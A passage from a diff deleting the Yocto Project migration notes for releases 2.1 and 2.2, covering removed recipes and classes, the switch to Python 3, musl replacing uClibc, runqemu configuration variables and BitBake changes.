-                <listitem><para><filename>pth</filename>:
-                    Became obsolete.
-                    </para></listitem>
-                <listitem><para><filename>liboil</filename>:
-                    Recipe is no longer needed and has been moved to the
-                    <filename>meta-multimedia</filename> layer.
-                    </para></listitem>
-                <listitem><para><filename>gtk-theme-torturer</filename>:
-                    Recipe is no longer needed and has been moved to the
-                    <filename>meta-gnome</filename> layer.
-                    </para></listitem>
-                <listitem><para><filename>gnome-mime-data</filename>:
-                    Recipe is no longer needed and has been moved to the
-                    <filename>meta-gnome</filename> layer.
-                    </para></listitem>
-                <listitem><para><filename>udev</filename>:
-                    Replaced by the <filename>eudev</filename> recipe for
-                    compatibility when using <filename>sysvinit</filename>
-                    with newer kernels.
-                    </para></listitem>
-                <listitem><para><filename>python-pygtk</filename>:
-                    Recipe became obsolete.
-                    </para></listitem>
-                <listitem><para><filename>adt-installer</filename>:
-                    Recipe became obsolete.
-                    See the
-                    "<link linkend='migration-2.1-adt-removed'>ADT Removed</link>"
-                    section for more information.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.1-class-changes'>
-        <title>Class Changes</title>
-
-        <para>
-            The following classes have changed:
-            <itemizedlist>
-                <listitem><para><filename>autotools_stage</filename>:
-                    Removed because the
-                    <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
-                    class now provides its functionality.
-                    Recipes that inherited from
-                    <filename>autotools_stage</filename> should now inherit
-                    from <filename>autotools</filename> instead.
-                    </para></listitem>
-                <listitem><para><filename>boot-directdisk</filename>:
-                    Merged into the <filename>image-vm</filename>
-                    class.
-                    The <filename>boot-directdisk</filename> class was rarely
-                    directly used.
-                    Consequently, this change should not cause any issues.
-                    </para></listitem>
-                <listitem><para><filename>bootimg</filename>:
-                    Merged into the
-                    <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
-                    class.
-                    The <filename>bootimg</filename> class was rarely
-                    directly used.
-                    Consequently, this change should not cause any issues.
-                    </para></listitem>
-                <listitem><para><filename>packageinfo</filename>:
-                    Removed due to its limited use by the Hob UI, which has
-                    itself been removed.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.1-build-system-ui-changes'>
-        <title>Build System User Interface Changes</title>
-
-        <para>
-            The following changes have been made to the build system user
-            interface:
-            <itemizedlist>
-                <listitem><para><emphasis>Hob GTK+-based UI</emphasis>:
-                    Removed because it is unmaintained and based on the
-                    outdated GTK+ 2 library.
-                    The Toaster web-based UI is much more capable and is
-                    actively maintained.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_TOAST_URL;#using-the-toaster-web-interface'>Using the Toaster Web Interface</ulink>"
-                    section in the Toaster User Manual for more
-                    information on this interface.
-                    </para></listitem>
-                <listitem><para><emphasis>"puccho" BitBake UI</emphasis>:
-                    Removed because is unmaintained and no longer useful.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.1-adt-removed'>
-        <title>ADT Removed</title>
-
-        <para>
-            The Application Development Toolkit (ADT) has been removed
-            because its functionality almost completely overlapped with the
-            <ulink url='&YOCTO_DOCS_SDK_URL;#sdk-using-the-standard-sdk'>standard SDK</ulink>
-            and the
-            <ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extensible'>extensible SDK</ulink>.
-            For information on these SDKs and how to build and use them, see the
-            <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-            manual.
-            <note>
-                The Yocto Project Eclipse IDE Plug-in is still supported and
-                is not affected by this change.
-            </note>
-        </para>
-    </section>
-
-    <section id='migration-2.1-poky-reference-distribution-changes'>
-        <title>Poky Reference Distribution Changes</title>
-
-        <para>
-            The following changes have been made for the Poky distribution:
-            <itemizedlist>
-                <listitem><para>
-                    The <filename>meta-yocto</filename> layer has been renamed
-                    to <filename>meta-poky</filename> to better match its
-                    purpose, which is to provide the Poky reference
-                    distribution.
-                    The <filename>meta-yocto-bsp</filename> layer retains its
-                    original name since it provides reference machines for
-                    the Yocto Project and it is otherwise unrelated to Poky.
-                    References to <filename>meta-yocto</filename> in your
-                    <filename>conf/bblayers.conf</filename> should
-                    automatically be updated, so you should not need to change
-                    anything unless you are relying on this naming elsewhere.
-                    </para></listitem>
-                <listitem><para>
-                    The
-                    <link linkend='ref-classes-uninative'><filename>uninative</filename></link>
-                    class is now enabled by default in Poky.
-                    This class attempts to isolate the build system from the
-                    host distribution's C library and makes re-use of native
-                    shared state artifacts across different host distributions
-                    practical.
-                    With this class enabled, a tarball containing a pre-built
-                    C library is downloaded at the start of the build.</para>
-
-                    <para>The <filename>uninative</filename> class is enabled
-                    through the
-                    <filename>meta/conf/distro/include/yocto-uninative.inc</filename>
-                    file, which for those not using the Poky distribution, can
-                    include to easily enable the same functionality.</para>
-
-                    <para>Alternatively, if you wish to build your own
-                    <filename>uninative</filename> tarball, you can do so by
-                    building the <filename>uninative-tarball</filename> recipe,
-                    making it available to your build machines
-                    (e.g. over HTTP/HTTPS) and setting a similar configuration
-                    as the one set by <filename>yocto-uninative.inc</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    Static library generation, for most cases, is now disabled
-                    by default in the Poky distribution.
-                    Disabling this generation saves some build time as well
-                    as the size used for build output artifacts.</para>
-
-                    <para>Disabling this library generation is accomplished
-                    through a
-                    <filename>meta/conf/distro/include/no-static-libs.inc</filename>,
-                    which for those not using the Poky distribution can
-                    easily include to enable the same functionality.</para>
-
-                    <para>Any recipe that needs to opt-out of having the
-                    "--disable-static" option specified on the configure
-                    command line either because it is not a supported option
-                    for the configure script or because static libraries are
-                    needed should set the following variable:
-                    <literallayout class='monospaced'>
-     DISABLE_STATIC = ""
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    The separate <filename>poky-tiny</filename> distribution
-                    now uses the musl C library instead of a heavily pared
-                    down <filename>glibc</filename>.
-                    Using musl results in a smaller
-                    distribution and facilitates much greater maintainability
-                    because musl is designed to have a small footprint.</para>
-
-                    <para>If you have used <filename>poky-tiny</filename> and
-                    have customized the <filename>glibc</filename>
-                    configuration you will need to redo those customizations
-                    with musl when upgrading to the new release.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.1-packaging-changes'>
-        <title>Packaging Changes</title>
-
-        <para>
-            The following changes have been made to packaging:
-            <itemizedlist>
-                <listitem><para>
-                    The <filename>runuser</filename> and
-                    <filename>mountpoint</filename> binaries, which were
-                    previously in the main <filename>util-linux</filename>
-                    package, have been split out into the
-                    <filename>util-linux-runuser</filename> and
-                    <filename>util-linux-mountpoint</filename> packages,
-                    respectively.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>python-elementtree</filename> package has
-                    been merged into the <filename>python-xml</filename>
-                    package.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.1-tuning-file-changes'>
-        <title>Tuning File Changes</title>
-
-        <para>
-            The following changes have been made to the tuning files:
-            <itemizedlist>
-                <listitem><para>
-                    The "no-thumb-interwork" tuning feature has been dropped
-                    from the ARM tune include files.
-                    Because interworking is required for ARM EABI, attempting
-                    to disable it through a tuning feature no longer makes
-                    sense.
-                    <note>
-                        Support for ARM OABI was deprecated in gcc 4.7.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>tune-cortexm*.inc</filename> and
-                    <filename>tune-cortexr4.inc</filename> files have been
-                    removed because they are poorly tested.
-                    Until the OpenEmbedded build system officially gains
-                    support for CPUs without an MMU, these tuning files would
-                    probably be better maintained in a separate layer
-                    if needed.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.1-supporting-gobject-introspection'>
-        <title>Supporting GObject Introspection</title>
-
-        <para>
-            This release supports generation of GLib Introspective
-            Repository (GIR) files through GObject introspection, which is
-            the standard mechanism for accessing GObject-based software from
-            runtime environments.
-            You can enable, disable, and test the generation of this data.
-            See the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-gobject-introspection-support'>Enabling GObject Introspection Support</ulink>"
-            section in the Yocto Project Development Tasks Manual
-            for more information.
-        </para>
-    </section>
-
-    <section id='migration-2.1-miscellaneous-changes'>
-        <title>Miscellaneous Changes</title>
-
-        <para>
-            These additional changes exist:
-            <itemizedlist>
-                <listitem><para>
-                    The minimum Git version has been increased to 1.8.3.1.
-                    If your host distribution does not provide a sufficiently
-                    recent version, you can install the buildtools, which
-                    will provide it.
-                    See the
-                    "<link linkend='required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</link>"
-                    section for more information on the buildtools tarball.
-                    </para></listitem>
-                <listitem><para>
-                    The buggy and incomplete support for the RPM version 4
-                    package manager has been removed.
-                    The well-tested and maintained support for RPM version 5
-                    remains.
-                    </para></listitem>
-                <listitem><para>
-                    Previously, the following list of packages were removed
-                    if package-management was not in
-                    <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>,
-                    regardless of any dependencies:
-                    <literallayout class='monospaced'>
-     update-rc.d
-     base-passwd
-     shadow
-     update-alternatives
-     run-postinsts
-                    </literallayout>
-                    With the Yocto Project 2.1 release, these packages are only
-                    removed if "read-only-rootfs" is in
-                    <filename>IMAGE_FEATURES</filename>, since they might
-                    still be needed for a read-write image even in the absence
-                    of a package manager (e.g. if users need to be added,
-                    modified, or removed at runtime).
-                    </para></listitem>
-                <listitem><para>
-                    The
-                    <ulink url='&YOCTO_DOCS_SDK_URL;#sdk-devtool-use-devtool-modify-to-modify-the-source-of-an-existing-component'><filename>devtool modify</filename></ulink>
-                    command now defaults to extracting the source since that
-                    is most commonly expected.
-                    The "-x" or "--extract" options are now no-ops.
-                    If you wish to provide your own existing source tree, you
-                    will now need to specify either the "-n" or
-                    "--no-extract" options when running
-                    <filename>devtool modify</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    If the formfactor for a machine is either not supplied
-                    or does not specify whether a keyboard is attached, then
-                    the default is to assume a keyboard is attached rather
-                    than assume no keyboard.
-                    This change primarily affects the Sato UI.
-                   </para></listitem>
-                <listitem><para>
-                    The <filename>.debug</filename> directory packaging is
-                    now automatic.
-                    If your recipe builds software that installs binaries into
-                    directories other than the standard ones, you no longer
-                    need to take care of setting
-                    <filename>FILES_${PN}-dbg</filename> to pick up the
-                    resulting <filename>.debug</filename> directories as these
-                    directories are automatically found and added.
-                    </para></listitem>
-                <listitem><para>
-                    Inaccurate disk and CPU percentage data has been dropped
-                    from <filename>buildstats</filename> output.
-                    This data has been replaced with
-                    <filename>getrusage()</filename> data and corrected IO
-                    statistics.
-                    You will probably need to update any custom code that reads
-                    the <filename>buildstats</filename> data.
-                    </para></listitem>
-                <listitem><para>
-                    The
-                    <filename>meta/conf/distro/include/package_regex.inc</filename>
-                    is now deprecated.
-                    The contents of this file have been moved to individual
-                    recipes.
-                    <note><title>Tip</title>
-                        Because this file will likely be removed in a future
-                        Yocto Project release, it is suggested that you remove
-                        any references to the file that might be in your
-                        configuration.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>v86d/uvesafb</filename> has been removed from
-                    the <filename>genericx86</filename> and
-                    <filename>genericx86-64</filename> reference machines,
-                    which are provided by the
-                    <filename>meta-yocto-bsp</filename> layer.
-                    Most modern x86 boards do not rely on this file and it only
-                    adds kernel error messages during startup.
-                    If you do still need to support
-                    <filename>uvesafb</filename>, you can
-                    simply add <filename>v86d</filename> to your image.
-                    </para></listitem>
-                <listitem><para>
-                     Build sysroot paths are now removed from debug symbol
-                     files.
-                     Removing these paths means that remote GDB using an
-                     unstripped build system sysroot will no longer work
-                     (although this was never documented to work).
-                     The supported method to accomplish something similar is
-                     to set <filename>IMAGE_GEN_DEBUGFS</filename> to "1",
-                     which will generate a companion debug image
-                     containing unstripped binaries and associated debug
-                     sources alongside the image.
-                     </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.2-release'>
-    <title>Moving to the Yocto Project 2.2 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 2.2 Release from the prior release.
-    </para>
-
-    <section id='migration-2.2-minimum-kernel-version'>
-        <title>Minimum Kernel Version</title>
-
-        <para>
-            The minimum kernel version for the target system and for SDK
-            is now 3.2.0, due to the upgrade
-            to <filename>glibc 2.24</filename>.
-            Specifically, for AArch64-based targets the version is
-            3.14.
-            For Nios II-based targets, the minimum kernel version is 3.19.
-            <note>
-                For x86 and x86_64, you can reset
-                <link linkend='var-OLDEST_KERNEL'><filename>OLDEST_KERNEL</filename></link>
-                to anything down to 2.6.32 if desired.
-            </note>
-        </para>
-    </section>
-
-    <section id='migration-2.2-staging-directories-in-sysroot-simplified'>
-        <title>Staging Directories in Sysroot Has Been Simplified</title>
-
-        <para>
-            The way directories are staged in sysroot has been simplified and
-            introduces the new
-            <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></link>,
-            <link linkend='var-SYSROOT_DIRS_NATIVE'><filename>SYSROOT_DIRS_NATIVE</filename></link>,
-            and
-            <link linkend='var-SYSROOT_DIRS_BLACKLIST'><filename>SYSROOT_DIRS_BLACKLIST</filename></link>.
-            See the
-            <ulink url='http://lists.openembedded.org/pipermail/openembedded-core/2016-May/121365.html'>v2 patch series on the OE-Core Mailing List</ulink>
-            for additional information.
-        </para>
-    </section>
-
-    <section id='migration-2.2-removal-of-old-images-from-tmp-deploy-now-enabled'>
-        <title>Removal of Old Images and Other Files in <filename>tmp/deploy</filename> Now Enabled</title>
-
-        <para>
-            Removal of old images and other files in
-            <filename>tmp/deploy/</filename> is now enabled by default due
-            to a new staging method used for those files.
-            As a result of this change, the
-            <filename>RM_OLD_IMAGE</filename> variable is now redundant.
-        </para>
-    </section>
-
-    <section id='migration-2.2-python-changes'>
-        <title>Python Changes</title>
-
-        <para>
-            The following changes for Python occurred:
-        </para>
-
-        <section id='migration-2.2-bitbake-now-requires-python-3.4'>
-            <title>BitBake Now Requires Python 3.4+</title>
-
-            <para>
-                BitBake requires Python 3.4 or greater.
-            </para>
-        </section>
-
-        <section id='migration-2.2-utf-8-locale-required-on-build-host'>
-            <title>UTF-8 Locale Required on Build Host</title>
-
-            <para>
-                A UTF-8 locale is required on the build host due to Python 3.
-                Since C.UTF-8 is not a standard, the default is en_US.UTF-8.
-            </para>
-        </section>
-
-        <section id='migration-2.2-metadata-now-must-use-python-3-syntax'>
-            <title>Metadata Must Now Use Python 3 Syntax</title>
-
-            <para>
-                The metadata is now required to use Python 3 syntax.
-                For help preparing metadata, see any of the many Python 3 porting
-                guides available.
-                Alternatively, you can reference the conversion commits for Bitbake
-                and you can use
-                <link linkend='oe-core'>OE-Core</link> as a guide for changes.
-                Following are particular areas of interest:
-                <literallayout class='monospaced'>
-     * subprocess command-line pipes needing locale decoding
-     * the syntax for octal values changed
-     * the <filename>iter*()</filename> functions changed name
-     * iterators now return views, not lists
-     * changed names for Python modules
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='migration-2.2-target-python-recipes-switched-to-python-3'>
-            <title>Target Python Recipes Switched to Python 3</title>
-
-            <para>
-                Most target Python recipes have now been switched to Python 3.
-                Unfortunately, systems using RPM as a package manager and
-                providing online package-manager support through SMART still
-                require Python 2.
-                <note>
-                    Python 2 and recipes that use it can still be built for the
-                    target as with previous versions.
-                </note>
-            </para>
-        </section>
-
-        <section id='migration-2.2-buildtools-tarball-includes-python-3'>
-            <title><filename>buildtools-tarball</filename> Includes Python 3</title>
-
-            <para>
-                <filename>buildtools-tarball</filename> now includes Python 3.
-            </para>
-        </section>
-    </section>
-
-    <section id='migration-2.2-uclibc-replaced-by-musl'>
-        <title>uClibc Replaced by musl</title>
-
-        <para>
-            uClibc has been removed in favor of musl.
-            Musl has matured, is better maintained, and is compatible with a
-            wider range of applications as compared to uClibc.
-        </para>
-    </section>
-
-    <section id='migration-2.2-B-no-longer-default-working-directory-for-tasks'>
-        <title><filename>${B}</filename> No Longer Default Working Directory for Tasks</title>
-
-        <para>
-            <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>
-            is no longer the default working directory for tasks.
-            Consequently, any custom tasks you define now need to either
-            have the
-            <filename>[</filename><ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>dirs</filename></ulink><filename>]</filename> flag set, or the task needs to change into the
-            appropriate working directory manually (e.g using
-            <filename>cd</filename> for a shell task).
-            <note>
-                The preferred method is to use the
-                <filename>[dirs]</filename> flag.
-            </note>
-        </para>
-    </section>
-
-    <section id='migration-2.2-runqemu-ported-to-python'>
-        <title><filename>runqemu</filename> Ported to Python</title>
-
-        <para>
-            <filename>runqemu</filename> has been ported to Python and has
-            changed behavior in some cases.
-            Previous usage patterns continue to be supported.
-        </para>
-
-        <para>
-            The new <filename>runqemu</filename> is a Python script.
-            Machine knowledge is no longer hardcoded into
-            <filename>runqemu</filename>.
-            You can choose to use the <filename>qemuboot</filename>
-            configuration file to define the BSP's own arguments and to make
-            it bootable with <filename>runqemu</filename>.
-            If you use a configuration file, use the following form:
-            <literallayout class='monospaced'>
-     <replaceable>image-name</replaceable>-<replaceable>machine</replaceable>.qemuboot.conf
-            </literallayout>
-            The configuration file enables fine-grained tuning of options
-            passed to QEMU without the <filename>runqemu</filename> script
-            hard-coding any knowledge about different machines.
-            Using a configuration file is particularly convenient when trying
-            to use QEMU with machines other than the
-            <filename>qemu*</filename> machines in
-            <link linkend='oe-core'>OE-Core</link>.
-            The <filename>qemuboot.conf</filename> file is generated by the
-            <filename>qemuboot</filename>
-            class when the root filesystem is being build (i.e.
-            build rootfs).
-            QEMU boot arguments can be set in BSP's configuration file and
-            the <filename>qemuboot</filename> class will save them to
-            <filename>qemuboot.conf</filename>.
-        </para>
-
-
-        <para>
-            If you want to use <filename>runqemu</filename> without a
-            configuration file, use the following command form:
-            <literallayout class='monospaced'>
-     $ runqemu <replaceable>machine</replaceable> <replaceable>rootfs</replaceable> <replaceable>kernel</replaceable> [<replaceable>options</replaceable>]
-            </literallayout>
-            Supported <replaceable>machines</replaceable> are as follows:
-            <literallayout class='monospaced'>
-     qemuarm
-     qemuarm64
-     qemux86
-     qemux86-64
-     qemuppc
-     qemumips
-     qemumips64
-     qemumipsel
-     qemumips64el
-            </literallayout>
-            Consider the following example, which uses the
-            <filename>qemux86-64</filename> machine,
-            provides a root filesystem, provides an image, and uses
-            the <filename>nographic</filename> option:
-            <literallayout class='monospaced'>
-$ runqemu qemux86-64 tmp/deploy/images/qemux86-64/core-image-minimal-qemux86-64.ext4 tmp/deploy/images/qemux86-64/bzImage nographic
-            </literallayout>
-        </para>
-
-        <para>
-            Following is a list of variables that can be set in configuration
-            files such as <filename>bsp.conf</filename> to enable the BSP
-            to be booted by <filename>runqemu</filename>:
-            <note>
-                "QB" means "QEMU Boot".
-            </note>
-            <literallayout class='monospaced'>
-     QB_SYSTEM_NAME: QEMU name (e.g. "qemu-system-i386")
-     QB_OPT_APPEND: Options to append to QEMU (e.g. "-show-cursor")
-     QB_DEFAULT_KERNEL: Default kernel to boot (e.g. "bzImage")
-     QB_DEFAULT_FSTYPE: Default FSTYPE to boot (e.g. "ext4")
-     QB_MEM: Memory (e.g. "-m 512")
-     QB_MACHINE: QEMU machine (e.g. "-machine virt")
-     QB_CPU: QEMU cpu (e.g. "-cpu qemu32")
-     QB_CPU_KVM: Similar to QB_CPU except used for kvm support (e.g. "-cpu kvm64")
-     QB_KERNEL_CMDLINE_APPEND: Options to append to the kernel's -append
-                               option (e.g. "console=ttyS0 console=tty")
-     QB_DTB: QEMU dtb name
-     QB_AUDIO_DRV: QEMU audio driver (e.g. "alsa", set it when support audio)
-     QB_AUDIO_OPT: QEMU audio option (e.g. "-soundhw ac97,es1370"), which is used
-                   when QB_AUDIO_DRV is set.
-     QB_KERNEL_ROOT: Kernel's root (e.g. /dev/vda)
-     QB_TAP_OPT: Network option for 'tap' mode (e.g.
-                 "-netdev tap,id=net0,ifname=@TAP@,script=no,downscript=no -device virtio-net-device,netdev=net0").
-                  runqemu will replace "@TAP@" with the one that is used, such as tap0, tap1 ...
-     QB_SLIRP_OPT: Network option for SLIRP mode (e.g. "-netdev user,id=net0 -device virtio-net-device,netdev=net0")
-     QB_ROOTFS_OPT: Used as rootfs (e.g.
-                    "-drive id=disk0,file=@ROOTFS@,if=none,format=raw -device virtio-blk-device,drive=disk0").
-                    runqemu will replace "@ROOTFS@" with the one which is used, such as
-                    core-image-minimal-qemuarm64.ext4.
-     QB_SERIAL_OPT: Serial port (e.g. "-serial mon:stdio")
-     QB_TCPSERIAL_OPT: tcp serial port option (e.g.
-                       " -device virtio-serial-device -chardev socket,id=virtcon,port=@PORT@,host=127.0.0.1 -device      virtconsole,chardev=virtcon"
-                       runqemu will replace "@PORT@" with the port number which is used.
-            </literallayout>
-        </para>
-
-        <para>
-            To use <filename>runqemu</filename>, set
-            <link linkend='var-IMAGE_CLASSES'><filename>IMAGE_CLASSES</filename></link>
-            as follows and run <filename>runqemu</filename>:
-            <note>
-                For command-line syntax, use
-                <filename>runqemu help</filename>.
-            </note>
-            <literallayout class='monospaced'>
-     IMAGE_CLASSES += "qemuboot"
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-2.2-default-linker-hash-style-changed'>
-        <title>Default Linker Hash Style Changed</title>
-
-        <para>
-            The default linker hash style for <filename>gcc-cross</filename>
-            is now "sysv" in order to catch recipes that are building software
-            without using the OpenEmbedded
-            <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>.
-            This change could result in seeing some "No GNU_HASH in the elf
-            binary" QA issues when building such recipes.
-            You need to fix these recipes so that they use the expected
-            <filename>LDFLAGS</filename>.
-            Depending on how the software is built, the build system used by
-            the software (e.g. a Makefile) might need to be patched.
-            However, sometimes making this fix is as simple as adding the
-            following to the recipe:
-            <literallayout class='monospaced'>
-     TARGET_CC_ARCH += "${LDFLAGS}"
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-2.2-kernel-image-base-name-no-longer-uses-kernel-imagetype'>
-        <title><filename>KERNEL_IMAGE_BASE_NAME</filename> no Longer Uses <filename>KERNEL_IMAGETYPE</filename></title>
-
-        <para>
-            The
-            <filename>KERNEL_IMAGE_BASE_NAME</filename>
-            variable no longer uses the
-            <link linkend='var-KERNEL_IMAGETYPE'><filename>KERNEL_IMAGETYPE</filename></link>
-            variable to create the image's base name.
-            Because the OpenEmbedded build system can now build multiple kernel
-            image types, this part of the kernel image base name as been
-            removed leaving only the following:
-            <literallayout class='monospaced'>
-     KERNEL_IMAGE_BASE_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}-${DATETIME}"
-            </literallayout>
-            If you have recipes or classes that use
-            <filename>KERNEL_IMAGE_BASE_NAME</filename> directly, you might
-            need to update the references to ensure they continue to work.
-        </para>
-    </section>
-
-    <section id='migration-2.2-bitbake-changes'>
-        <title>BitBake Changes</title>
-
-        <para>
-            The following changes took place for BitBake:
-            <itemizedlist>
-                <listitem><para>
-                    The "goggle" UI and standalone image-writer tool have
-                    been removed as they both require GTK+ 2.0 and
-                    were not being maintained.
-                    </para></listitem>
-                <listitem><para>
-                    The Perforce fetcher now supports
-                    <link linkend='var-SRCREV'><filename>SRCREV</filename></link>
-                    for specifying the source revision to use, be it
-                    <filename>${</filename><link linkend='var-AUTOREV'><filename>AUTOREV</filename></link><filename>}</filename>,
-                    changelist number, p4date, or label, in preference to
-                    separate
-                    <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
-                    parameters to specify these.
-                    This change is more in-line with how the other fetchers
-                    work for source control systems.
-                    Recipes that fetch from Perforce will need to be updated
-                    to use <filename>SRCREV</filename> in place of specifying
-                    the source revision within
-                    <filename>SRC_URI</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    Some of BitBake's internal code structures for accessing
-                    the recipe cache needed to be changed to support the new
-                    multi-configuration functionality.
-                    These changes will affect external tools that use BitBake's
-                    tinfoil module.
-                    For information on these changes, see the changes made to
-                    the scripts supplied with OpenEmbedded-Core:
-                    <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=189371f8393971d00bca0fceffd67cc07784f6ee'>1</ulink>
-                    and
-                    <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=4a5aa7ea4d07c2c90a1654b174873abb018acc67'>2</ulink>.
-                    </para></listitem>
-                <listitem><para>
-                    The task management code has been rewritten to avoid using
-                    ID indirection in order to improve performance.
-                    This change is unlikely to cause any problems for most
-                    users.
-                    However, the setscene verification function as pointed to
-                    by <filename>BB_SETSCENE_VERIFY_FUNCTION</filename>
-                    needed to change signature.
-                    Consequently, a new variable named
-                    <filename>BB_SETSCENE_VERIFY_FUNCTION2</filename>
-                    has been added allowing multiple versions of BitBake
-                    to work with suitably written metadata, which includes
-                    OpenEmbedded-Core and Poky.
-                    Anyone with custom BitBake task scheduler code might also
-                    need to update the code to handle the new structure.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.2-swabber-has-been-removed'>
-        <title>Swabber has Been Removed</title>
-
-        <para>
-            Swabber, a tool that was intended to detect host contamination in
-            the build process, has been removed, as it has been unmaintained
-            and unused for some time and was never particularly effective.
-            The OpenEmbedded build system has since incorporated a number of
-            mechanisms including enhanced QA checks that mean that there is
-            less of a need for such a tool.
-        </para>
-    </section>
-
-    <section id='migration-2.2-removed-recipes'>
-        <title>Removed Recipes</title>
-
-        <para>
-            The following recipes have been removed:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>augeas</filename>:
-                    No longer needed and has been moved to
-                    <filename>meta-oe</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>directfb</filename>:
-                    Unmaintained and has been moved to
-                    <filename>meta-oe</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gcc</filename>:
-                    Removed 4.9 version.
-                    Versions 5.4 and 6.2 are still present.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gnome-doc-utils</filename>:
-                    No longer needed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gtk-doc-stub</filename>:
-                    Replaced by <filename>gtk-doc</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gtk-engines</filename>:
-                    No longer needed and has been moved to
-                    <filename>meta-gnome</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gtk-sato-engine</filename>:
-                    Became obsolete.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libglade</filename>:
-                    No longer needed and has been moved to
-                    <filename>meta-oe</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libmad</filename>:
-                    Unmaintained and functionally replaced by
-                    <filename>libmpg123</filename>.
-                    <filename>libmad</filename> has been moved to
-                    <filename>meta-oe</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libowl</filename>:
-                    Became obsolete.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>libxsettings-client</filename>:
-                    No longer needed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>oh-puzzles</filename>:
-                    Functionally replaced by
-                    <filename>puzzles</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>oprofileui</filename>:
-                    Became obsolete.
-                    OProfile has been largely supplanted by perf.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>packagegroup-core-directfb.bb</filename>:
-                    Removed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>core-image-directfb.bb</filename>:
-                    Removed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>pointercal</filename>:
-                    No longer needed and has been moved to
-                    <filename>meta-oe</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>python-imaging</filename>:
-                    No longer needed and moved to
-                    <filename>meta-python</filename>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>python-pyrex</filename>:
-                    No longer needed and moved to
-                    <filename>meta-python</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>sato-icon-theme</filename>:
-                    Became obsolete.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>swabber-native</filename>:
-                    Swabber has been removed.
-                    See the
-                    <link linkend='migration-2.2-swabber-has-been-removed'>entry on Swabber</link>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>tslib</filename>:
-                    No longer needed and has been moved to
-                    <filename>meta-oe</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>uclibc</filename>:
-                    Removed in favor of musl.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>xtscal</filename>:
-                    No longer needed and moved to
-                    <filename>meta-oe</filename>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.2-removed-classes'>
-        <title>Removed Classes</title>
-
-        <para>
-            The following classes have been removed:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>distutils-native-base</filename>:
-                    No longer needed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>distutils3-native-base</filename>:
-                    No longer needed.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>sdl</filename>:
-                    Only set
-                    <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
-                    and
-                    <link linkend='var-SECTION'><filename>SECTION</filename></link>,
-                    which are better set within the recipe instead.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>sip</filename>:
-                    Mostly unused.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>swabber</filename>:
-                    See the
-                    <link linkend='migration-2.2-swabber-has-been-removed'>entry on Swabber</link>.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.2-minor-packaging-changes'>
-        <title>Minor Packaging Changes</title>
-
-        <para>
-            The following minor packaging changes have occurred:
-            <itemizedlist>
-                <listitem><para>
